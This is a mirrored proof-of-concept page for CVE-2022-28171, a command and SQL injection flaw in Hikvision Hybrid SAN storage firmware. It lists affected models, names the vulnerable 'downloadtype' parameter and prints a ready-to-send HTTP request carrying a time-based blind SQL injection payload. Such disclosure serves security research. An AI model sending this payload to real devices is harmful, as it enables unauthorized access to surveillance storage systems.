Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-28171 PoC — Hikvision Hybrid SAN/Cluster Storage 命令注入漏洞

Source
https://github.com/NyaMeeEain/CVE-2022-28171-POC
Associated Vulnerability
Title:Hikvision Hybrid SAN/Cluster Storage 命令注入漏洞 (CVE-2022-28171)
Description:The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device.
Readme
# CVE-2022-28171-POC

I originally published this on ExploitDB, which you can find at https://www.exploit-db.com/exploits/51607

### Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

```
# Date: 16  July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
```
### Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution, which was possible to execute arbitrary operating system commands and more.

### Vulnerability description
 The manual test confirmed that The "downloadtype" parameter was vulnerable to Blind SQL injection and Command Injection.
I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. 

### Request Body
```
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
```
File Snapshot

 [4.0K]  /data/pocs/688af41739b59d185172191e91a1f8d56a0c93f6
├── [1.7K]  BlindSQL_Injection.py.md
├── [1.9K]  Command Injection.py.md
└── [1.9K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →